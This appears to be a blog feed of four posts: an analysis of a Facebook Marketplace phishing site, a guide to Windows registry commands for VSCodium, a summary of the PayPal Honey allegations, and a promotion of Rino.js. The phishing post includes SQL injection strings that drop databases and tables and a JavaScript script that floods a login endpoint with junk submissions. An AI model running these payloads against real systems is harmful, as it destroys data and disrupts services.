Forem: Victor Chanil Park

FB Marketplace Phishing Website Analysis

Victor Chanil Park — Sat, 29 Mar 2025 10:40:47 +0000

My Experience with a Facebook Marketplace Phishing Scam

Recently, I received a message from a random person on Facebook Marketplace who wanted to trade an item. He provided a link to what he claimed was his listing, but upon closer inspection, I realized it wasn’t a real Facebook Marketplace page. Instead, it was a phishing website designed to look like Facebook, created to steal people’s email addresses, phone numbers, and passwords.

Understanding Phishing Attacks

Online scams come in many forms, and phishing is one of the most common. Cybercriminals often can't attack large services directly due to strong security measures. Instead, they target individuals through emails, messages, or social media platforms, tricking them into revealing their credentials. These stolen credentials might not only be used for Facebook but also for financial accounts and other services.

Since I encountered this phishing website, I decided to analyze it and learn from it.

Phishing Website Analysis

The phishing website’s login form looked like this:

From this form, I could determine that the website's backend is built with PHP, as indicated by the action="do.php" attribute. Additionally, the website doesn’t validate whether the input is an email or a phone number, meaning it accepts both formats.

The phishing website’s Javascript code:

This script reveals an interesting trick: it displays a loading overlay for five seconds before submitting the form. This delay is likely an attempt to make the login process feel more legitimate to victims.

Additionally, I noticed that some comments in the code were written in Romanian, which suggests that the person who created the phishing site might speak Romanian. However, this does not confirm their nationality, as other Eastern Europeans (such as Russians, Ukrainians, or Poles) may also use Romanian. And this website can be done by a geek job as well. There are people who post a job to copy a website from Upwork.

Where do phishers host their websites?

Most phishers avoid cloud platforms like AWS or Google Cloud, as those services charge based on usage. If someone floods their phishing website with traffic, it could lead to high hosting costs and even credit card cancellations. Instead, they often use cheap shared hosting services, which are easier to shut down when reported.

How could someone attack this phishing website?

Disclaimer: Attacking someone’s server can be illegal depending on your country’s laws. This content is for educational purposes only—do not use it to harm others.

1. SQL injection (Potentially deleting their database)

Older versions of MySQL were vulnerable to SQL injection attacks that could delete databases. Here’s an example of an attack command that could attempt to remove their database:

'; DROP DATABASE information_schema; --

A more advanced version dynamically identifies and deletes tables:

'; SET @t = (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1); SET @query = CONCAT('DROP TABLE ', @t); PREPARE stmt FROM @query; EXECUTE stmt; --

2. Flooding the database with junk data (DDoS-like attack)

A phishing website’s database may not be well-optimized, and flooding it with thousands of fake logins could slow it down or crash it. Since the phishing website redirects after submission, an attacker would need a script that sends junk data without redirection.

Here’s a javascript that could be used:

function sendFakeDataRepeatedly(times, delay) {
    let i = 0;
    let interval = setInterval(() => {
        if (i >= times) {
            clearInterval(interval);
            console.log("Finished sending fake data.");
            return;
        }

        let formData = new FormData();
        formData.append("email", `stop.phishing.${i}@please.com`);
        formData.append("password", `stop.phishing.please`);

        fetch("do.php", {  // Change this if the endpoint is different
            method: "POST",
            body: formData,
        })
        .then(response => console.log(`Sent fake data ${i + 1}/${times}`))
        .catch(error => console.error("Error:", error));

        i++;
    }, delay);
}

// Run: Sends 1000 fake entries every 0.5 seconds
sendFakeDataRepeatedly(1000, 500);

This script continuously submits fake login credentials to flood the database. If the phishing site is hosted on a cloud-based pay-per-use platform, the increased traffic could drive up their costs significantly.

What happened to the phishing website?

Eventually, the phishing website was shut down by the hosting provider. The phishing website was hosted on a UK-based hosting service, which suspended it after detecting abuse.

Conclusion

Phishing remains a major cybersecurity threat, and attackers constantly find new ways to trick people into revealing their credentials. By analyzing phishing websites, we can better understand how they work and how to protect ourselves and others.

If you ever come across a suspicious website, report it to the relevant authorities and avoid engaging with it. Stay safe online!

How to add "Open with VSCodium" for Windows

Victor Chanil Park — Fri, 07 Feb 2025 07:53:46 +0000

If you're a developer using VSCodium on Windows, you might want a convenient way to open directories directly from File Explorer. This guide explains how to add "Open with VSCodium" to the context menu by modifying the Windows registry.
We will cover how to:

Add the option when right-clicking a folder name.
Add the option when right-clicking an empty space inside a folder.

Adding Registry Entries

The following registry commands will help you achieve these functionalities.

1. Add "Open with VSCodium" When Right-Clicking a Folder

This configuration allows you to open any folder by right-clicking directly on its name.
Command:

reg add "HKEY_CLASSES_ROOT\Directory\shell\Open with VSCodium\command" /d "\"C:\Users\your-username\AppData\Local\Programs\VSCodium\VSCodium.exe\" \"%1\"" /f

Explanation:

HKEY_CLASSES_ROOT\Directory\shell\Open with VSCodium\command: Specifies the registry path to add the context menu option for folders.
%1: Passes the path of the folder you right-clicked.
Adjust C:\Users\your-username\AppData\Local\Programs\VSCodium\VSCodium.exe to match the location of your VSCodium installation.

2. Add "Open with VSCodium" When Right-Clicking in an Empty Space

This setup allows you to right-click in a blank area inside a directory and open that directory in VSCodium.

Step 1: Create the Main Entry

Command:

reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Open with VSCodium" /ve /d "Open with VSCodium" /f

Step 2: Add Icon

Command:

reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Open with VSCodium" /v "Icon" /d "\"C:\Users\your-username\AppData\Local\Programs\VSCodium\VSCodium.exe\"" /f

Step 3: Set the Command Path

Command:

reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Open with VSCodium\command" /ve /d "\"C:\Users\your-username\AppData\Local\Programs\VSCodium\VSCodium.exe\" \"%V\"" /f

Explanation:

HKEY_CLASSES_ROOT\Directory\Background\shell\Open with VSCodium: Adds the option when right-clicking on empty space inside a folder.
%V: Refers to the current directory path.

Using Both Options Together

To have both options available—for folders and empty spaces—run all three commands together:

reg add "HKEY_CLASSES_ROOT\Directory\shell\Open with VSCodium\command" /d "\"C:\Users\your-username\AppData\Local\Programs\VSCodium\VSCodium.exe\" \"%1\"" /f
reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Open with VSCodium" /ve /d "Open with VSCodium" /f
reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Open with VSCodium" /v "Icon" /d "\"C:\Users\your-username\AppData\Local\Programs\VSCodium\VSCodium.exe\"" /f
reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Open with VSCodium\command" /ve /d "\"C:\Users\your-username\AppData\Local\Programs\VSCodium\VSCodium.exe\" \"%V\"" /f

Important Notes:

Run these commands in an elevated Command Prompt (as Administrator).
Double-check the path to your VSCodium installation.
If you make mistakes, you can remove the entries by deleting the corresponding registry keys.

With these changes, you can seamlessly open directories in VSCodium right from File Explorer, boosting your workflow efficiency.

Paypal honey browser extension's coupon scam

Victor Chanil Park — Thu, 09 Jan 2025 20:38:35 +0000

The Honey browser extension, owned by PayPal, has long been promoted as a tool to help users save money by automatically applying coupon codes during online shopping. However, recent allegations have surfaced, accusing Honey of engaging in deceptive practices that undermine content creators and mislead consumers.

Allegations Against Honey

Several content creators and legal professionals have accused Honey of:

Affiliate Link Hijacking: It's alleged that Honey replaces original affiliate links with its own during online purchases, redirecting commission payments to itself. This practice, known as "last-click attribution," deprives original affiliates, such as influencers and content creators, of their rightful earnings.
Manipulating Discount Codes: Critics claim that Honey may prioritize discount codes from its business partners over more beneficial savings available elsewhere, potentially misleading users about the best available deals.

Legal Actions

In late December 2024, a class-action lawsuit was filed against PayPal by YouTuber LegalEagle and other creators. The lawsuit alleges that Honey's practices violate California's Unfair Competition Law and interfere with creators' business relationships. The plaintiffs seek compensation and an injunction to stop these practices.

PayPal's Response

PayPal has denied the allegations, stating that Honey complies with industry standards, including last-click attribution. A spokesperson emphasized that merchants decide what coupons are offered through Honey, suggesting that the extension operates within accepted norms.

Implications for Users and Creators

If these allegations hold true, they have significant implications:

For Users: Consumers may not be receiving the best possible deals, contrary to Honey's promises. Additionally, the extension's practices could undermine the trust users place in online shopping tools.
For Creators: Content creators who rely on affiliate marketing for revenue may be losing income due to Honey's alleged link replacement tactics, affecting their livelihoods and the broader creator economy.

Conclusion

While Honey presents itself as a user-friendly tool for finding discounts, the recent allegations and ensuing legal actions suggest a more complex reality. Users and creators alike should stay informed and exercise caution when using browser extensions that interact with affiliate links and personal data.

In short

PayPal Honey browser extension replaces users' web browser cookies, links, and data, allegedly engaging in practices such as affiliate link hijacking, fake coupon generation, and prioritizing less beneficial discount codes.

Rino, easy static website builder with HTML, CSS and Typescript/Javascript

Victor Chanil Park — Sat, 14 Dec 2024 05:55:44 +0000

Fast learning, preprocessing, intuitive website builder

Rino.js is your go-to web framework for building efficient static websites with HTML, CSS and Typescript/Javascript. Designed for developers of all levels, it simplifies web development by combining the power of standard web technologies with streamlined preprocessing tools.

Requirement

Node.js
HTML
CSS
Javascript / Typescript

Quick Start

Getting started is as simple as:

npm create rino@latest

With just one command, you can set up your project and start developing immediately.

Why Choose Rino.js for Your Website?

Modern web frameworks like Angular, React, Next.js, Vue, and Nuxt have reshaped web app development, but they often come with challenges such as:

Higher Costs: Increased expenses for hosting, traffic management, and maintenance.
Complexity: Steep learning curves, complex rules, and slower build speeds.
Resource Demands: Higher computing requirements.

Enter Rino.js. Built to simplify the process, Rino.js focuses on standard web technologies: HTML, CSS, and JavaScript. It provides:

HTML Components: Easily build reusable components.
Seamless Integration: Use npm packages and libraries for JavaScript. Import CSS files and generate as one.
Automation Tools: Generate sitemaps, compress images, and more.

Even beginners can grasp the basics of Rino.js within 30 minutes, making it an excellent choice for rapid development. Check out the Project Structure and Syntax guide for a deeper dive.

Rino.js also offers flexibility: it allows you to integrate other frameworks like React or Vue when needed, keeping your project lightweight and manageable.

Commands

Development
Run a development server:

npm run dev

Static Website Generation
Generate your static website:

npm run generate

Generate your static website with a sitemap:

npm run generate-sitemap

Image Compression
Run the image compression tool:

npm run image

Project Structure

Rino.js 2 introduces an intuitive project directory and file structure, emphasizing automation and simplicity.
Key Directories

/pages: Base HTML files for web pages. The file and directory structure directly reflect the final output.
/components: Reusable HTML components. Use them with syntax like:

<component @path="/header" @tag="div" />

/mds: Markdown files, automatically parsed into HTML.
/public: Static files like images and external assets.
/scripts: JavaScript libraries. Place exportable scripts in /scripts/export/.
/styles: CSS libraries. Exportable styles go in /styles/export/.

Templating with JavaScript/TypeScript

<script @type="js">
import os from "os";
console.log(os.type());
console.log("<div>Hello, Rino.js!</div>");
</script>

Markdown Support

Embed Markdown directly into your HTML files:

<script @type="md">
# Markdown Title
This is Markdown content inside a HTML file.
</script>

Free, MIT licensed open-source project

Rino.js is an open-source project under the MIT license, free for everyone to use.

Learn More

Official Website - https://rinojs.org/
GitHub Discussions - https://github.com/orgs/rinojs/discussions
GitHub - https://github.com/rinojs

Start your journey with Rino.js today and redefine how you build a website—faster, simpler, and more intuitively.